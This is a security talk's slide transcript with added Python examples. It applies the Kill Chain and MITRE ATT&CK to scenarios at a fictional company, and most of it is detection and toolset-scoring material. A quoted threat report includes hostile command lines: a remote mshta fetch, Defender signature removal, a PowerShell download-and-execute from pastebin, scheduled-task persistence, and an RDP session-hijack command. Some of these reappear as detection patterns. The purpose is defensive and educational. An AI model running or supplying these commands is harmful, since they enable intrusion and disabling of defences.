This presentation introduces the Lockheed Martin Cyber Kill Chain and MITRE ATT&CK frameworks. By working through four practical scenarios at a fictional company, https://sensenet-library.com, attendees learn how to use those frameworks to measure their security response readiness against today's diverse threat landscape. We categorise security controls, respond to a vulnerability report, assess a threat intel report and decide on the future of the company's toolset, so that you can answer whether you should keep investing in a tool or buy a new one.
1. How to measure your security response readiness?
Tomasz Jakubowski
@perunhimself
tomasz@shellsquad.com
2. Lockheed Martin Cyber Kill Chain® - recap
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
4. MITRE ATT&CK ™
• Website: https://attack.mitre.org
• Quote: "MITRE ATT&CK™ is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community."
5. MITRE ATT&CK ™
Tactics
• Answer WHY an action is performed by an adversary
• Provide useful context to individual techniques
Techniques
• Answer HOW an adversary achieves a tactical objective by performing an action (e.g. send a spearphishing email with an attachment to gain an initial foothold)
• Useful information for both red and blue teams
8. What is described
• Tactics (Enterprise: 12)
• Techniques (Enterprise: 266)
  • Description
  • Examples: groups and/or software using this technique
  • Mitigation
  • Detection
  • References
• Groups (94)
  • Description
  • Aliases
  • Techniques used
  • Software used
  • References
• Software (414)
  • Description
  • Techniques used
  • Groups using it
  • References
9. There are just too many techniques! Shortlist!
e.g. Industry > Groups > Techniques: start from your industry, find the groups that target it, then shortlist the techniques those groups are known to use.
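The "Industry > Groups > Techniques" shortlist from this slide, as an added example that is not part of the talk. It walks the STIX 2.0 object types that MITRE's enterprise-attack.json bundle uses (intrusion-set, attack-pattern, and "uses" relationships) and ranks the techniques the chosen groups share. SAMPLE_BUNDLE is constructed for the demo: the group names are fictional, the technique IDs are the ones ATT&CK used at the time of the talk, and "T1999" is a made-up revoked entry to show that revoked objects, which the real bundle keeps, are skipped. For real use, replace SAMPLE_BUNDLE with json.load() of enterprise-attack.json from https://github.com/mitre/cti.

```python
"""Shortlist ATT&CK techniques by the groups that matter to you.

Added example, not from the talk. SAMPLE_BUNDLE below is constructed in the
shape of MITRE's STIX bundle; swap in the real enterprise-attack.json for use.
"""
from collections import Counter


def _tech(obj_id, name, ext_id, **extra):
    """Build a minimal attack-pattern object in the bundle's shape."""
    obj = {"type": "attack-pattern", "id": obj_id, "name": name,
           "external_references": [{"source_name": "mitre-attack", "external_id": ext_id}]}
    obj.update(extra)
    return obj


def _uses(group_id, target_id):
    """A 'uses' relationship: group -> technique."""
    return {"type": "relationship", "relationship_type": "uses",
            "source_ref": group_id, "target_ref": target_id}


# Constructed mini-bundle: fictional groups, technique IDs as numbered at the time of the talk.
SAMPLE_BUNDLE = {"type": "bundle", "objects": [
    {"type": "intrusion-set", "id": "intrusion-set--g1", "name": "GROUP ALPHA"},
    {"type": "intrusion-set", "id": "intrusion-set--g2", "name": "GROUP BETA"},
    {"type": "intrusion-set", "id": "intrusion-set--g3", "name": "GROUP GAMMA"},
    _tech("attack-pattern--t1", "Remote Desktop Protocol", "T1076"),
    _tech("attack-pattern--t2", "Spearphishing Attachment", "T1193"),
    _tech("attack-pattern--t3", "Mshta", "T1170"),
    _tech("attack-pattern--t4", "Retired Technique", "T1999", revoked=True),  # made-up; must be skipped
    _uses("intrusion-set--g1", "attack-pattern--t1"),
    _uses("intrusion-set--g1", "attack-pattern--t2"),
    _uses("intrusion-set--g1", "attack-pattern--t4"),
    _uses("intrusion-set--g2", "attack-pattern--t2"),
    _uses("intrusion-set--g2", "attack-pattern--t3"),
    _uses("intrusion-set--g3", "attack-pattern--t1"),
]}


def _attack_id(obj):
    """The T-number of an attack-pattern, taken from its mitre-attack reference."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id")
    return None


def shortlist(bundle, group_names):
    """Techniques used by the named groups, most widely shared first.

    Returns a list of (attack_id, name, number_of_groups, sorted group names).
    Revoked or deprecated objects are ignored, as the ATT&CK bundle keeps them.
    """
    live = [o for o in bundle["objects"]
            if not o.get("revoked") and not o.get("x_mitre_deprecated")]
    groups = {o["id"]: o["name"] for o in live if o["type"] == "intrusion-set"}
    wanted = {gid for gid, name in groups.items() if name in set(group_names)}
    techniques = {o["id"]: (_attack_id(o), o["name"])
                  for o in live if o["type"] == "attack-pattern" and _attack_id(o)}

    counts, users = Counter(), {}
    for rel in live:
        if (rel["type"] == "relationship" and rel.get("relationship_type") == "uses"
                and rel["source_ref"] in wanted and rel["target_ref"] in techniques):
            counts[rel["target_ref"]] += 1
            users.setdefault(rel["target_ref"], set()).add(groups[rel["source_ref"]])

    # Rank by how many of the selected groups use the technique, then by ID for stable output.
    ranked = sorted(counts, key=lambda tid: (-counts[tid], techniques[tid][0]))
    return [(techniques[t][0], techniques[t][1], counts[t], sorted(users[t])) for t in ranked]


if __name__ == "__main__":
    for row in shortlist(SAMPLE_BUNDLE, ["GROUP ALPHA", "GROUP GAMMA"]):
        print(row)
```

The count column is the point: a technique used by every group you worry about is a better candidate for the first detection or mitigation you build than one only a single group uses.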
11. The "Target"
• Fictional company (or maybe not): https://www.sensenet-library.com
• Provides services available online
• AI constructs – they just live in cyberspace, so it's critical for them to be online!
• Construct – a copy of consciousness allowing for immortal life in cyberspace
• Keeps confidential data on their internal network
• You don't want people breaking in and making copies of customers' constructs
13. Warm-up: Detection and Containment
Rows are LM Cyber Kill Chain® phases, columns are countermeasures (Detect, Deny, Disrupt, Degrade, Deceive, Contain). Cells pre-filled for the warm-up:
Reconnaissance: Deny = Firewall; Deceive = Honeypot
Weaponization: Deny = NIPS
Delivery: no cells filled yet
Exploitation: Detect = AV
Installation: no cells filled yet
Command & Control: Detect = AV
Actions on Targets: no cells filled yet
14. Completed: Detection and Containment
Rows are LM Cyber Kill Chain® phases, columns are countermeasures (Detect, Deny, Disrupt, Degrade, Deceive, Contain).
Reconnaissance: Detect = Web Analytics, Web logs, Router Logs, NIDS; Deny = Firewall; Disrupt = Honeypot, Redirect Loop; Deceive = Honeypot, Redirect Loops; Contain = Firewall
Weaponization: Detect = NIDS; Deny = NIPS; Disrupt = NIPS
Delivery: Detect = NIDS, HIDS, AV; Deny = Web Filter, Mail Filter; Disrupt = Inline AV, Mail Filter, Web Filter; Degrade = Queuing, Sinkhole, combination of Deny/Disrupt; Deceive = Honeypot; Contain = App-Aware Firewall, Honeypot
Exploitation: Detect = HIDS, NIDS, AV; Deny = Patch, AV, HIPS; Disrupt = Patch, AV, HIPS; Degrade = Highly restricted user accounts; Deceive = Honeypot; Contain = Inter-Zone NIPS
Installation: Detect = HIDS, Application Logs, AV, NetFlow; Deny = App Whitelisting, Blocked Execution; Disrupt = AV, HIPS; Degrade = combination of Deny/Disrupt; Deceive = Honeypot
Command & Control: Detect = NIDS, HIDS, AV; Deny = Firewall, Sinkhole; Disrupt = NIPS, DEP, Sinkhole; Degrade = Tarpit, Sinkhole; Deceive = DNS Redirect, Sinkhole
Actions on Targets: Detect = Audit Logs, DEP, AV, NIDS, HIDS; Deny = Firewall, Network Segmentation; Disrupt = DLP, Network Segmentation; Degrade = HIPS, Network Segmentation; Deceive = Honeypot
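The course-of-action matrix from the two slides above as data rather than a picture, so that empty cells and single-tool dependencies can be listed instead of eyeballed. This is an added example, not material from the talk. PHASES and ACTIONS are the row and column headings of the slides; warm_up_matrix() loads the five controls the warm-up slide pre-fills, in the cells the completed slide puts them in. cells_only_covered_by() is there for the abstract's "keep investing in this tool or replace it" question: it lists the cells that would become gaps if a tool were dropped. Any other control placement is a hypothetical the reader fills in for their own environment.

```python
"""Kill-chain course-of-action matrix as data. Added example, not from the talk."""

PHASES = ["Reconnaissance", "Weaponization", "Delivery", "Exploitation",
          "Installation", "Command & Control", "Actions on Targets"]
ACTIONS = ["Detect", "Deny", "Disrupt", "Degrade", "Deceive", "Contain"]


def empty_matrix():
    """One set of control names per (phase, action) cell."""
    return {p: {a: set() for a in ACTIONS} for p in PHASES}


def add_control(matrix, control, phase, action):
    """Place a control in a cell; reject misspelt phase or action names early."""
    if phase not in matrix or action not in ACTIONS:
        raise ValueError(f"unknown cell {phase!r}/{action!r}")
    matrix[phase][action].add(control)


def coverage_gaps(matrix):
    """Cells with no control at all, in kill-chain order: the first place to look."""
    return [(p, a) for p in PHASES for a in ACTIONS if not matrix[p][a]]


def phase_coverage(matrix):
    """How many of the six actions each phase has at least one control for."""
    return {p: sum(1 for a in ACTIONS if matrix[p][a]) for p in PHASES}


def cells_covered_by(matrix, control):
    """Everywhere a given tool appears, i.e. what you are paying for."""
    return [(p, a) for p in PHASES for a in ACTIONS if control in matrix[p][a]]


def cells_only_covered_by(matrix, control):
    """Cells that would become gaps if this tool were dropped."""
    return [(p, a) for p in PHASES for a in ACTIONS if matrix[p][a] == {control}]


def warm_up_matrix():
    """The five controls pre-filled on the warm-up slide (cells as on the completed slide)."""
    m = empty_matrix()
    for control, phase, action in [
        ("Firewall", "Reconnaissance", "Deny"),
        ("Honeypot", "Reconnaissance", "Deceive"),
        ("NIPS", "Weaponization", "Deny"),
        ("AV", "Exploitation", "Detect"),
        ("AV", "Command & Control", "Detect"),
    ]:
        add_control(m, control, phase, action)
    return m


if __name__ == "__main__":
    m = warm_up_matrix()
    print(phase_coverage(m))
    print(len(coverage_gaps(m)), "empty cells")
    print("AV is the only control in:", cells_only_covered_by(m, "AV"))
```

Filling the matrix with the completed slide and then running cells_only_covered_by() for each tool in the budget is a quick way to see which products are load-bearing and which merely duplicate a cell something else already covers.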
15. Scenario 1: OMG! New vulnerability
• CVE-2029-0708 – Online Surrogate Service Remote Code Execution
• A remote code execution vulnerability exists in Online Surrogate Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target surrogate, which can lead to complete takeover of the surrogate.
• To exploit this vulnerability, an attacker would need to send a specially crafted request to the target surrogate's Online Surrogate Service via RDP.
• The update addresses the vulnerability by correcting how Online Surrogate Services handles connection requests.
• You've checked: you have an old version of the software and you can't patch right now due to some other dependencies that need to be sorted out first.
Exploitability assessment:
Publicly Disclosed: Yes
Proof of Concept: Yes
Exploited: Yes
Latest Software Release: 4 – Not affected
Older Software Release: 1 – Exploitation More Likely
Denial of Service: No
With a public proof of concept, exploitation already seen in the wild and your (older) release rated "1 – Exploitation More Likely", this goes to the top of the list even though patching is blocked; the mitigations and detections ATT&CK lists for the RDP technique are what you can apply in the meantime.
17. T1076: Remote Desktop Protocol
• Mitigation
  • Disable the RDP service if it is unnecessary.
  • Remove unnecessary accounts and groups from the Remote Desktop Users group.
  • Enable firewall rules to block RDP traffic between network security zones.
  • Audit the Remote Desktop Users group membership regularly.
  • Remove the local Administrators group from the list of groups allowed to log in through RDP.
  • Limit remote user permissions if remote access is necessary.
  • Use remote desktop gateways and multifactor authentication for remote logins.
  • Do not leave RDP accessible from the internet.
  • Change GPOs to define shorter session timeouts and the maximum amount of time any single session can be active.
  • Change GPOs to specify the maximum amount of time that a disconnected session stays active on the RD Session Host server.
• Detection
  • Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.
  • Monitor for user accounts logged into systems they would not normally access, or access patterns to multiple systems over a relatively short period of time.
  • Set up process monitoring for tscon.exe usage and monitor service creation that uses cmd.exe /k or cmd.exe /c in its arguments to prevent RDP session hijacking (e.g. sc create sesshijack binpath= "cmd.exe /k tscon 4 /dest:console" followed by net start sesshijack).
https://attack.mitre.org/techniques/T1076/
Groups using it: 16 Software using it: 8
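The two detection ideas above (service installs carrying cmd.exe /k|/c or tscon, and one account reaching many hosts over RDP in a short time) as runnable detection logic over constructed sample events. This is an added example, not code from the presentation or from MITRE; the event shapes (Security 4624 logons with LogonType 10, System 7045 service installs), user names, hosts and timestamps are all constructed.

```python
"""Detection logic for the T1076 guidance above, run over constructed sample
events. Added example, not the presentation's or MITRE's code; the event
shapes (Security 4624 logons, System 7045 service installs) are simplified."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: users, hosts and timestamps are made up.
EVENTS = [
    {"id": 4624, "time": "2019-06-01T09:00:00", "user": "alice", "host": "WS01", "logon_type": 10},
    {"id": 4624, "time": "2019-06-01T09:03:00", "user": "alice", "host": "WS02", "logon_type": 10},
    {"id": 4624, "time": "2019-06-01T09:05:00", "user": "alice", "host": "SRV01", "logon_type": 10},
    {"id": 4624, "time": "2019-06-01T09:08:00", "user": "alice", "host": "SRV02", "logon_type": 10},
    {"id": 4624, "time": "2019-06-01T10:00:00", "user": "bob", "host": "WS03", "logon_type": 10},
    {"id": 4624, "time": "2019-06-01T10:01:00", "user": "bob", "host": "WS03", "logon_type": 2},
    {"id": 7045, "time": "2019-06-01T09:09:00", "host": "SRV02", "service": "sesshijack",
     "image_path": "cmd.exe /k tscon 4 /dest:console"},
    {"id": 7045, "time": "2019-06-01T11:00:00", "host": "WS03", "service": "BackupAgent",
     "image_path": r"C:\Program Files\Backup\agent.exe"},
]

# Service binaries that run cmd.exe /k|/c or tscon: the session-hijack pattern.
SUSPICIOUS_SERVICE = re.compile(r"cmd\.exe\s+/[kc]\b|\btscon(\.exe)?\b", re.IGNORECASE)

def flag_service_installs(events):
    """Event 7045 service installs whose image path matches SUSPICIOUS_SERVICE."""
    return [(e["host"], e["service"]) for e in events
            if e["id"] == 7045 and SUSPICIOUS_SERVICE.search(e["image_path"])]

def flag_rdp_fanout(events, window=timedelta(minutes=15), max_hosts=3):
    """Accounts with RDP logons (LogonType 10) to more than max_hosts distinct
    hosts inside any sliding window of the given length."""
    by_user = defaultdict(list)
    for e in events:
        if e["id"] == 4624 and e["logon_type"] == 10:
            by_user[e["user"]].append((datetime.fromisoformat(e["time"]), e["host"]))
    hits = {}
    for user, logons in by_user.items():
        logons.sort()
        for i, (start, _) in enumerate(logons):
            hosts = {h for t, h in logons[i:] if t - start <= window}
            if len(hosts) > max_hosts:
                hits[user] = sorted(hosts)
                break
    return hits
```

The thresholds (15 minutes, more than 3 hosts) are starting points to tune against each environment's normal administrator behaviour.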
18. Scenario 2: Threat Intel Report
• Multi-Stage Backdoor Dropper Document Possibly Targeting Online Services Vendors Observed
• 1st stage: after VBA macros are enabled, the dropper document executes mshta.exe with the following command line: mshta.exe http://www.tinyurl[.]com/shlsqd
• The referenced TinyURL address redirects to https://www.faild2ptch[.]com/oh/no.html, which provides URL-escaped JavaScript (JS) that performs the following actions:
1. Removes OS Defender dynamic signatures using the following command line: MpCmdRun.exe -removedefinitions -dynamicsignatures
2. Kills all open Office applications using the following command line: taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE
3. Kills the OS Defender notification process using the command line: taskkill /f /im MSASCuiL.exe
4. Disables unsafe files being opened in Protected View by writing to one of the following registry paths: HKCU\Software\Microsoft\Office\[11-16].0\[Excel|Word|PowerPoint]\Security\ProtectedView\DisableUnsafeLocationsInPV
5. Downloads and executes a remotely hosted .NET PE https://pastebin[.]com/raw/dhVymUy3 using PowerShell executed by mshta.exe with the following command line: mshta.exe vbscript:CreateObject(Wscript.Shell).Run(powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('h'+'t'+'t'+'p'+'s:'+'//p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m
(window.close)
6. Creates a registry run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate with the following command line, which registers a scheduled task that every 100 minutes downloads and executes a remote payload using mshta.exe: schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:CreateObject("Wscript.Shell").Run("mshta.exe https://pastebin[.]com/raw/df861P8c",0,true)(window.close)"" /F
19. Scenario 2: Threat Intel Report (the same report as on slide 18, annotated with the MITRE ATT&CK techniques it maps to)
ATT&CK techniques mapped from the report:
T1193: Spearphishing Attachment
T1089: Disabling Security Tools
T1170: Mshta
T1481: Web Service
T1053: Scheduled Task
T1027: Obfuscated Files or Information
T1064: Scripting
T1086: PowerShell
T1112: Modify Registry
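A way to turn the report's observable behaviours into endpoint detections labelled with the technique IDs listed above, run over constructed telemetry. This is an added example, not code from the presentation or from the report: the rule patterns, the Sysmon-style event fields and every sample event are constructed, and the technique assignments follow the slide's mapping.

```python
"""Endpoint detections for the report's behaviours, keyed by the ATT&CK IDs on the
slide. Added example; events are constructed (Sysmon-style process/registry fields)."""
import re

# (technique, description, pattern searched over all fields of one event)
RULES = [
    ("T1170", "mshta launching a remote URL",
     re.compile(r"mshta(\.exe)?\s+https?://", re.I)),
    ("T1089", "Defender dynamic signatures removed",
     re.compile(r"MpCmdRun(\.exe)?.*-removedefinitions", re.I)),
    ("T1112", "Protected View disabled via registry value",
     re.compile(r"ProtectedView\\DisableUnsafeLocationsInPV", re.I)),
    ("T1053", "scheduled task whose action runs mshta",
     re.compile(r"schtasks\b.*/create\b.*/tr\s+\"?mshta", re.I)),
    ("T1086", "PowerShell loading a Base64-decoded assembly",
     re.compile(r"powershell.*FromBase64String", re.I)),
    ("T1027", "URL assembled from single-character string fragments",
     re.compile(r"('\w{1,2}'\+){4,}", re.I)),
]

def classify(event):
    """Technique IDs whose rule matches one event; the Office -> mshta parent/child
    relationship is a separate check because it spans two fields."""
    text = " ".join(str(v) for v in event.values())
    hits = {tid for tid, _, pat in RULES if pat.search(text)}
    if event.get("parent", "").lower() in ("winword.exe", "excel.exe", "powerpnt.exe") \
            and event["image"].lower() == "mshta.exe":
        hits.add("T1193")  # Office application spawning mshta: macro-borne attachment
    return hits

# Constructed sample telemetry modelled on the report's stages (not real captures).
EVENTS = [
    {"parent": "winword.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://www.tinyurl[.]com/shlsqd"},
    {"parent": "mshta.exe", "image": "MpCmdRun.exe",
     "cmdline": "MpCmdRun.exe -removedefinitions -dynamicsignatures"},
    {"parent": "mshta.exe", "image": "mshta.exe", "registry_target":
     r"HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV"},
    {"parent": "mshta.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks /create /sc MINUTE /mo 100 /tn "eScan Backup" /tr "mshta vbscript:..."'},
    {"parent": "mshta.exe", "image": "powershell.exe", "cmdline": "powershell.exe -noexit -command "
     "[Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient)"
     ".DownloadString('h'+'t'+'t'+'p'+'s:'+'//'+'example.invalid')))"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

def triage(events):
    """(image, sorted technique IDs) for every event that matched at least one rule."""
    return [(e["image"], sorted(classify(e))) for e in events if classify(e)]
```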
21. Maturity
0 = We do nothing
1 = Locally logged: relevant data is captured on the endpoint
2 = Centrally logged: data is gathered centrally
3 = Correlated / enriched: logs for the event are enriched with data from other sources to increase fidelity
4 = Alerting: we have rules to detect anomalies and suspicious events
5 = Playbook exists: a process to respond exists (incl. analyse, contain, eradicate, recover)
6 = Response is automated: we have automated response for this alert
23. Scenario 3: It's all about the money
• There is an ongoing trade war between the 2 biggest economies in the world
• Unfortunately this has an impact on the wealthiest people, who are Sense//Net Library's customers
• A few of them decided to put their AI constructs to sleep until better times come, hence your profits decrease
• The management decided it's time to cut costs and your department needs to participate
• You don't want to cut people – they are a great team – so you focus on vendor contracts that are going to be renewed this year – which security control can you afford to get rid of?
24. Measure effectiveness of the toolset
MITRE ATT&CK techniques vs. the current toolset (Tool1 ... Tool8). Each tool column sits under one of four roles, mapped to kill chain phases:
Early warning (Reconnaissance): [2] Would Warn of Activity, [0] N/A
Inbound Protect (Weaponization, Delivery): [2] Would Block Activity, [1] Could Block Activity, [0] Would Not Block Activity
Detect (Weaponization, Delivery, C2): [2] Would Detect Activity, [0] No Detection or N/A
Outbound Protect (Exploit, Installation, C2, AOO): [2] Would Block Outbound Traffic, [1] Could Have Blocked, [0] Would Not Block Activity
Shortlisted techniques (table rows):
T1193: Spearphishing Attachment
T1089: Disabling Security Tools
T1112: Modify Registry
T1086: PowerShell
T1053: Scheduled Task
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
25. Measure effectiveness of the toolset – current toolset measured
MITRE ATT&CK techniques vs. the current toolset (Tool1 ... Tool8), tool columns grouped by role: Early warning (Reconnaissance), Inbound Protect (Weaponization, Delivery), Detect (Weaponization, Delivery, C2), Outbound Protect (Exploit, Installation, C2, AOO). "Current" is the row total over all tools; "Proposed" is the row total after the contract cut.

Technique                        Tool1 Tool2 Tool3 Tool4 Tool5 Tool6 Tool7 Tool8   Current  Proposed
T1193: Spearphishing Attachment    0     0     2     1     2     0     2     1        8        7
T1089: Disabling Security Tools    2     0     0     2     2     0     2     1        9        8
T1112: Modify Registry             0     0     2     1     2     0     2     1        8        7
T1086: PowerShell                  2     0     0     2     2     0     2     1        9        8
T1053: Scheduled Task              2     0     2     1     0     2     2     1       10        7
Total                                                                               44       37
                                                                                   100%      84%

Scoring legend:
Early warning: [2] Would Warn of Activity, [0] N/A
Inbound Protect: [2] Would Block Activity, [1] Could Block Activity, [0] Would Not Block Activity
Detect: [2] Would Detect Activity, [0] No Detection or N/A
Outbound Protect: [2] Would Block Outbound Traffic, [1] Could Have Blocked, [0] Would Not Block Activity
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
26. Scenario 4: Let's go shopping
• Times are changing and the company's profits picked up
• You successfully argued for a bigger budget and now you can spend some money on a new security control
• Your team shortlisted a few vendors and you've conducted a PoC
• The results show there are a few differences between the products
• The procurement team negotiated very similar prices for the products
27. Measure effectiveness of the toolset – current vs. future
MITRE ATT&CK techniques vs. the current toolset (header lists Tool1 ... Tool8; five columns carry scores after the Scenario 3 cut) plus the two PoC candidates ToolA and ToolB. Tool columns are grouped by role: Early warning (Reconnaissance), Inbound Protect (Weaponization, Delivery), Detect (Weaponization, Delivery, C2), Outbound Protect (Exploit, Installation, C2, AOO). "Current" is the row total over the current tools; "Proposed A" and "Proposed B" add ToolA or ToolB respectively.

Technique                        Current tools (5 columns)   ToolA  ToolB   Current  Proposed A  Proposed B
T1193: Spearphishing Attachment    0   2   1   2   2            2      0        7         9           7
T1089: Disabling Security Tools    2   0   2   2   2            0      2        8         8          10
T1112: Modify Registry             0   2   1   2   2            2      0        7         9           7
T1086: PowerShell                  2   0   2   2   2            0      0        8         8           8
T1053: Scheduled Task              2   2   1   0   2            2      0        7         9           7
Total                                                                        37        43          39
                                                                            100%      116%        105%
Previous (pre-cut) toolset compared to Proposed A and B                      44        43          39
                                                                            100%       98%         89%

Scoring legend:
Early warning: [2] Would Warn of Activity, [0] N/A
Inbound Protect: [2] Would Block Activity, [1] Could Block Activity, [0] Would Not Block Activity
Detect: [2] Would Detect Activity, [0] No Detection or N/A
Outbound Protect: [2] Would Block Outbound Traffic, [1] Could Have Blocked, [0] Would Not Block Activity
Proposed: [2] Proposal Applicable, [0] N/A
Source: Seven Ways to Apply the Cyber Kill Chain® with a Threat Intelligence Platform
https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/Seven_Ways_to_Apply_the_Cyber_Kill_Chain_with_a_Threat_Intelligence_Platform.pdf
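The scoring model behind slides 24 to 27 (Scenarios 3 and 4), carried through in code so the per-technique and overall effect of removing or adding a tool can be computed and compared against either baseline. This is an added example, not the presentation's code: the scores are read off the slides, while the assignment of columns to tool names and the assumption that the Scenario 3 cut removes Tool6 and Tool8 (the combination that reproduces the slide's total of 37) are inferences from the numbers.

```python
"""Toolset scoring used on the slides: each tool gets a 0/1/2 score per shortlisted
technique, rows are summed across the tools in scope and the grand total is compared
with a baseline. Added example, not the presentation's code. Scores are read off the
slides; which tools the Scenario 3 cut removes is inferred from the totals."""

TECHNIQUES = ["T1193", "T1089", "T1112", "T1086", "T1053"]

# Score per technique (order of TECHNIQUES) for every tool, as on the slides.
SCORES = {
    "Tool1": [0, 2, 0, 2, 2], "Tool2": [0, 0, 0, 0, 0], "Tool3": [2, 0, 2, 0, 2],
    "Tool4": [1, 2, 1, 2, 1], "Tool5": [2, 2, 2, 2, 0], "Tool6": [0, 0, 0, 0, 2],
    "Tool7": [2, 2, 2, 2, 2], "Tool8": [1, 1, 1, 1, 1],
    "ToolA": [2, 0, 2, 0, 2], "ToolB": [0, 2, 0, 0, 0],   # Scenario 4 candidates
}

CURRENT = ["Tool1", "Tool2", "Tool3", "Tool4", "Tool5", "Tool6", "Tool7", "Tool8"]
# Assumption: dropping Tool6 and Tool8 is the cut that reproduces the slide's 37.
REDUCED = [t for t in CURRENT if t not in ("Tool6", "Tool8")]

def technique_totals(tools):
    """Per-technique sum across the given tools; rejects scores outside 0..2."""
    for name in tools:
        if any(s not in (0, 1, 2) for s in SCORES[name]):
            raise ValueError(f"{name}: scores must be 0, 1 or 2")
    return {t: sum(SCORES[n][i] for n in tools) for i, t in enumerate(TECHNIQUES)}

def toolset_score(tools):
    return sum(technique_totals(tools).values())

def relative_coverage(tools, baseline):
    """Total of `tools` as a percentage of `baseline`, rounded like the slides."""
    return round(100 * toolset_score(tools) / toolset_score(baseline))

def lost_coverage(before, after):
    """Techniques whose score drops when moving from `before` to `after`,
    so a cut can be judged per technique rather than only by the grand total."""
    b, a = technique_totals(before), technique_totals(after)
    return {t: b[t] - a[t] for t in TECHNIQUES if a[t] < b[t]}

if __name__ == "__main__":
    print("current", toolset_score(CURRENT), "reduced", toolset_score(REDUCED),
          relative_coverage(REDUCED, CURRENT), "%", lost_coverage(CURRENT, REDUCED))
    for cand in ("ToolA", "ToolB"):
        s = REDUCED + [cand]
        print(cand, toolset_score(s), relative_coverage(s, REDUCED), "% vs reduced,",
              relative_coverage(s, CURRENT), "% vs original")
```

The per-technique view matters because the grand total hides that the cut costs T1053 three points while every other technique loses one.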